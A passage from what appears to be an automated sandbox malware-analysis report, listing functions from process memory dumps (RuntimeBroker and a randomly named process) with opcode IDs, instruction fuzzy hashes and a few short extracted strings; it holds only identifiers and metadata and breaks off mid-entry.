                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction ID: b1aa58225af30ef3009926a3ad24ed8b1d7ed8fd6556f6ede8ea2fe6e7ca0ed1
                                                      • Opcode Fuzzy Hash: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction Fuzzy Hash: 5BE01A20E0C51A4FFB54F614C8517BD63A1FF98380FA000B8D92E936D2CF386D809A59
                                                      Function 00007FF848EB2290 Relevance: .0, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                      Function 00007FF848EB71D0 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction ID: 627c17e139fed78debd96b5f264f4ccc04e0e0a128c9c2da64bcc411b2ed45b6
                                                      • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction Fuzzy Hash: 73D01234B549044FC70CB6388C99C747391EB6E216B9540ADD00AD77B1DA6ADC89CB41
                                                      Function 00007FF848EBBB50 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction ID: a1b89c7fc47824ca41353d7ed97788391dad4335844ea0bde91eb149b60312ea
                                                      • Opcode Fuzzy Hash: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction Fuzzy Hash: BAD01234B549094FC70CF638985987473A1EB6A216B9540B9D00AC72B1DA6ADC89C741
                                                      Function 00007FF848E81953 Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a53fffbf47e8b827f8280769b86e4b9331d22277492955711db5a8e4f30c3f9
                                                      • Instruction ID: 86768869b4743e8fc2d14d81b3a7159010f65cc74b77f0d786da0c324266f904
                                                      • Opcode Fuzzy Hash: 9a53fffbf47e8b827f8280769b86e4b9331d22277492955711db5a8e4f30c3f9
                                                      • Instruction Fuzzy Hash: 61D05E31A1CA4A4EFB91B7B0841A2BD5292BF10340F880478D85E971C3CF3F34005A94
                                                      Function 00007FF848E806AD Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction ID: c31856955ed2e3c74bff67d5eed7038733c80ad951e00bd8430a1a3eff3b721d
                                                      • Opcode Fuzzy Hash: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction Fuzzy Hash: 86C08C00D0F90B08E440316F14020ACA2007FC47A4FE10032C01C42092EE3D20C5116E
                                                      Function 00007FF848E8559A Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction ID: 93df89259070d39eeee891dfa952953b187c30ae293fd6bc712e26a92ea0700f
                                                      • Opcode Fuzzy Hash: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction Fuzzy Hash: FCD05222C1D9228EFA72214008241BD0201AB803B0FA90772D86D2B0C09F7CAC019A2A
                                                      Function 00007FF848E812D8 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction ID: 4aa18af1f661fabb0a2e2203a43a442a2c3407ad42402b65ed2ba776a251d591
                                                      • Opcode Fuzzy Hash: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction Fuzzy Hash: D6C08C305108088FC908FB28C88480837A0FF09200BC20090E008C7170D229DCC1D741
                                                      Function 00007FF848E84E07 Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 19a0e5630a833397944d504fe41ebb430271e853582a35f048b20d25221aeed7
                                                      • Instruction ID: fa0e485c9cc0cb8398afc22e5057af43897503fa949f4c49e72e71342f46a56a
                                                      • Opcode Fuzzy Hash: 19a0e5630a833397944d504fe41ebb430271e853582a35f048b20d25221aeed7
                                                      • Instruction Fuzzy Hash: 03C08C01E0DC5A9AE256620450221BE44029F80788F9400B5E00E873CACF0C1D01428A
                                                      Function 00007FF848E806D0 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction ID: 37703ee556c4e8627d10b7c80c769574e06979db5dbbed10f1728ee220f40bb0
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: 0BB01200C5E40F04E40431BB084306C70407FC4244FC10070D40C41182E97D1094025A

                                                      Non-executed Functions

                                                      Function 00007FF848E809B0 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: bfa2c339f050b900016796cb309f7cc88d50831665c47b0694f3740441f1cca7
                                                      • Instruction ID: d8d3bf98ff88aa51002e8d513fa4bc641ecc0acbef1d3040d477bc56c04107bd
                                                      • Opcode Fuzzy Hash: bfa2c339f050b900016796cb309f7cc88d50831665c47b0694f3740441f1cca7
                                                      • Instruction Fuzzy Hash: 9F515ED6ADE86A7DE61D36BDB4111FD6B44EF812B5F4C93B7E04C890838E18608186FD

                                                      Executed Functions

                                                      Function 00007FF848E60D48 Relevance: 2.8, Strings: 2, Instructions: 258COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5[_H$<O_^
                                                      • API String ID: 0-4097811043
                                                      • Opcode ID: 80a65cafcd9180dd51f6007d4065dc7fbc89fb2e4e059592fcd8e214a844ce03
                                                      • Instruction ID: 997b47c38c198bfc01185b7b5b58337a1f212d6d86212026e425e0bb966b834f
                                                      • Opcode Fuzzy Hash: 80a65cafcd9180dd51f6007d4065dc7fbc89fb2e4e059592fcd8e214a844ce03
                                                      • Instruction Fuzzy Hash: D5912070D1CA998FE789EB2888683A97FE0FB96350F4401BFC049E72D2DB782805C751
                                                      Function 00007FF848E712B2 Relevance: .8, Instructions: 777COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb620311adc114da4834bbcae6c1b593fa98cfcf82ca011ba5faa692858b0ada
                                                      • Instruction ID: 787f20aaba5f562e451a65e875ec26245c2d9ec966b0927f5f918cb5d5fd9892
                                                      • Opcode Fuzzy Hash: bb620311adc114da4834bbcae6c1b593fa98cfcf82ca011ba5faa692858b0ada
                                                      • Instruction Fuzzy Hash: 8832A321E1CD5A9FEA98FA2884516B973E2FF94780F5445B9C00EC32C7DF39AD428785
                                                      Function 00007FF848E938ED Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: K_H
                                                      • API String ID: 0-313846638
                                                      • Opcode ID: 42b85c14721e9f4c92e13ca788842edc17d2cf6ca8287d3d2f4c88c1e3a837b9
                                                      • Instruction ID: 60a59a1571c1e139e0211b2c54c37be7afad35553796a7b0daed175e7c83c5bf
                                                      • Opcode Fuzzy Hash: 42b85c14721e9f4c92e13ca788842edc17d2cf6ca8287d3d2f4c88c1e3a837b9
                                                      • Instruction Fuzzy Hash: 4381F121E1C98A5FEA98FA6C84663B972D2FF58784F0451B9D40DC32D7DFB8AC418385
                                                      Function 00007FF848E93943 Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: K_H
                                                      • API String ID: 0-313846638
                                                      • Opcode ID: eec5591cc25538d4d742259da19fe434d1e9da848cdd1b63b67787b721d42569
                                                      • Instruction ID: 105e7bbb9e2f1d7acaa5347f233fd071d72d03102936cb97d8acefe2d1b9f856
                                                      • Opcode Fuzzy Hash: eec5591cc25538d4d742259da19fe434d1e9da848cdd1b63b67787b721d42569
                                                      • Instruction Fuzzy Hash: 6F51CF20E1C94E5FEA98FA6C84563B973D2FF98798F049179C40EC3287DFB8A8414385
                                                      Function 00007FF848E921E9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: a3fc98c30183d817befaad58a7f6e55f14bd32c80d85a2e1cf28a36eda82bfc1
                                                      • Instruction ID: b124d02e397c1a7b8d0303321a6513e14cd487888f4127425d5d9bfeb77e7c54
                                                      • Opcode Fuzzy Hash: a3fc98c30183d817befaad58a7f6e55f14bd32c80d85a2e1cf28a36eda82bfc1
                                                      • Instruction Fuzzy Hash: D7F06D7194E7C44FCB1AEA348868454BFA0EF6721174A41EEC056CF1A7EA6D8885C701
                                                      Function 00007FF848E9ADE9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: bb9db8f43b936f5a9276f2212608ea6e09e5ea1b7c496b4efdb6c600900496e4
                                                      • Instruction ID: 3fdafac0eca549572a7c9544ab130378ecd1bed7e7640abfe0a55f293b209eef
                                                      • Opcode Fuzzy Hash: bb9db8f43b936f5a9276f2212608ea6e09e5ea1b7c496b4efdb6c600900496e4
                                                      • Instruction Fuzzy Hash: 9FE0487144E7D44FCB06EB7484698553FA0EF67615B8A40DEC045CF1B3E66D988AC701
                                                      Function 00007FF848E92279 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 14e9cd2fd34bdcd1ab25e42f361d0aa4373e0c220ce9b71c60bbb481b855a50b
                                                      • Instruction ID: a1ead72dabc0c1e0d961b4c791e8f8e33dcaf56f56cd3c594ab1bc0e3267adef
                                                      • Opcode Fuzzy Hash: 14e9cd2fd34bdcd1ab25e42f361d0aa4373e0c220ce9b71c60bbb481b855a50b
                                                      • Instruction Fuzzy Hash: CDE01A7184E7C44FCB4AEB74886A9943FA0EE6B21578A40EEC045CF1B3E62D8849C701
                                                      Function 00007FF848E980D9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 1d4c0adb280a7b74bed20475f351d23ccb1b6fc6b23704964918a18213da3daa
                                                      • Instruction ID: 529866176ef0b688c76d809301fc431a556a99169a3855fceffe04aa7ab50ff9
                                                      • Opcode Fuzzy Hash: 1d4c0adb280a7b74bed20475f351d23ccb1b6fc6b23704964918a18213da3daa
                                                      • Instruction Fuzzy Hash: BBE0127184E7D44FCB06EB7488798557FA0EE6725174B41EEC045CF1B3D62D8845C701
                                                      Function 00007FF848E71349 Relevance: .5, Instructions: 537COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c2f16d8db0eed7b95124cf1ec9bc6142995b0c4af75eab6ecbfd495284f2cdf
                                                      • Instruction ID: 882f5c91a7a2c844df045c3e8c3407336dcb5a08418624bd35ca4bd901546209
                                                      • Opcode Fuzzy Hash: 9c2f16d8db0eed7b95124cf1ec9bc6142995b0c4af75eab6ecbfd495284f2cdf
                                                      • Instruction Fuzzy Hash: 82027F30E1CA5A8FEB98FA2884516B973E2FF54780F5445B9D00DD3287DF39AD428B85
                                                      Function 00007FF848E608D0 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 954ca19030be468e762079e2b9b9c615a78a594cd170796482d260903d71e36f
                                                      • Instruction ID: d0472730689bf4f00cc30f2200dfa38d9b95aa8bef770d0c6ff86ffd4e4db22d
                                                      • Opcode Fuzzy Hash: 954ca19030be468e762079e2b9b9c615a78a594cd170796482d260903d71e36f
                                                      • Instruction Fuzzy Hash: 95415952E4D9626EE309B378A0992FC7B80FF853A5F1844BBD04CC71D3DF1878818698
                                                      Function 00007FF848E60998 Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5c55a7dc2c3594fc99d55759e0972df581a349fda12e9a9b03ada7104c52ddb0
                                                      • Instruction ID: 4e94254cd464871059f89a6d4d84a490b46f18c3f5ae4c13ce344f390e797994
                                                      • Opcode Fuzzy Hash: 5c55a7dc2c3594fc99d55759e0972df581a349fda12e9a9b03ada7104c52ddb0
                                                      • Instruction Fuzzy Hash: 2321F120B1C95A6FE788F62C544A77976C2EF99755F5000B9E40EC32D6DE38AC818284
                                                      Function 00007FF848E61171 Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b752cb3155085784818c1bdad258b6ee478b5465c63b7f8ce02ee63f5597b272
                                                      • Instruction ID: 40788cbf85b3da7ff049946fbcca73f2d2bc6af64e5a9f775e979591e6fe0ec9
                                                      • Opcode Fuzzy Hash: b752cb3155085784818c1bdad258b6ee478b5465c63b7f8ce02ee63f5597b272
                                                      • Instruction Fuzzy Hash: C131903090D68A8FDB46FB28C8599A97BF0FF56340F4801FBC009E71A2DB39A945C751
                                                      Function 00007FF848E92979 Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b0243912507ddc9e1e6782c85687398bd61f75be31daa59a4af5bccb2ec1fcd3
                                                      • Instruction ID: 54e6bf763a33c76965641bd93c6e8f966b5a0dde57a54ed4fa85784cf9953c0f
                                                      • Opcode Fuzzy Hash: b0243912507ddc9e1e6782c85687398bd61f75be31daa59a4af5bccb2ec1fcd3
                                                      • Instruction Fuzzy Hash: E231A231E0C94A8FEB58EA5CC4906A977E2FB98358F04467AC01EC72C6CF78A9418785
                                                      Function 00007FF848E60960 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 64bb0f6fbc5dfa243dec5bbf9c9e530fedfee5dfd8d236c9f438564ac6911903
                                                      • Instruction ID: fefd0d2c22d782f766028a27d3ea50dd256d60f85e3200fb3cd6f35918d8ed1d
                                                      • Opcode Fuzzy Hash: 64bb0f6fbc5dfa243dec5bbf9c9e530fedfee5dfd8d236c9f438564ac6911903
                                                      • Instruction Fuzzy Hash: 54210051E4DD163EF658B278644A2B826C1EF483A5F5850BAE40DC31D3CE2CBC808698
                                                      Function 00007FF848E62A19 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74a5bc95528279d0bf9efaf27905a9ea30d52b67ed0fbb62744051dd28b87582
                                                      • Instruction ID: 46013800c90834bb859a11db80516c945551bd244e4f492b285ca7f6029c2a4c
                                                      • Opcode Fuzzy Hash: 74a5bc95528279d0bf9efaf27905a9ea30d52b67ed0fbb62744051dd28b87582
                                                      • Instruction Fuzzy Hash: 66216021E0C91A4FEAA4FA2884587B822D2FF94390F9446B6D40DF32D3DF78BC408749
                                                      Function 00007FF848E60C25 Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fcc0373f254db8b8ef7b22df881a4e3e9247f4a04d98af2c2931e565abd75569
                                                      • Instruction ID: cd4336740407765a907e7c66450db6391151c833f96426d27b60038eba4fd6f4
                                                      • Opcode Fuzzy Hash: fcc0373f254db8b8ef7b22df881a4e3e9247f4a04d98af2c2931e565abd75569
                                                      • Instruction Fuzzy Hash: 3521D331A0D6999FE711FB28C4452EC7FB0FF42364F5445B6C044EB1C2DB3829898755
                                                      Function 00007FF848E76D44 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 69b3c7983ce58908a4cd32e603136205f0f02f971fbb2aafebc2ff12a22fd4e2
                                                      • Instruction ID: 67a6eb3ff0139141714dc92bf27de1e7d90bd7c2eb160065a79604a0b3069690
                                                      • Opcode Fuzzy Hash: 69b3c7983ce58908a4cd32e603136205f0f02f971fbb2aafebc2ff12a22fd4e2
                                                      • Instruction Fuzzy Hash: 4B114F21E1C91A4FFA98FB2884556B87292FF98340F6405B9D40ED72D6DF38AC024784
                                                      Function 00007FF848E63D85 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 809b0bbd2f106ae4096608400b874f6d30c2f984d2f1489032fa78ca88a3a27c
                                                      • Instruction ID: a14513ea1018bad181c3a09d56bde8f50a40c2eaf40908cc2ac6b311d00648d0
                                                      • Opcode Fuzzy Hash: 809b0bbd2f106ae4096608400b874f6d30c2f984d2f1489032fa78ca88a3a27c
                                                      • Instruction Fuzzy Hash: C411EC70D08A198FDB94EB09C894BA973E1FB58315F5441BAD40EE7290CB34AEC5CF85
                                                      Function 00007FF848E60C38 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 893427cabd90b9adc6bb90f9f073489abb9a61f46fa982472e1b64fda8483e5f
                                                      • Instruction ID: 17694e1a09c135b95e7514d67183e2b7774c3c39c66e6200dfe7267fae4a3ed7
                                                      • Opcode Fuzzy Hash: 893427cabd90b9adc6bb90f9f073489abb9a61f46fa982472e1b64fda8483e5f
                                                      • Instruction Fuzzy Hash: D611E135A0D7999FE702FB38C4402DC7FB0FF82360F5544B6C080EB292D63826498784
                                                      Function 00007FF848E97180 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 070aff2842b219d20710d49355332a30556335885e1bc23de92677ed733dbae0
                                                      • Instruction ID: 20a97ef6c514553b9f7ebbb0fead66c4ceaa6566b3ab7ba7e4282ef7dcf82485
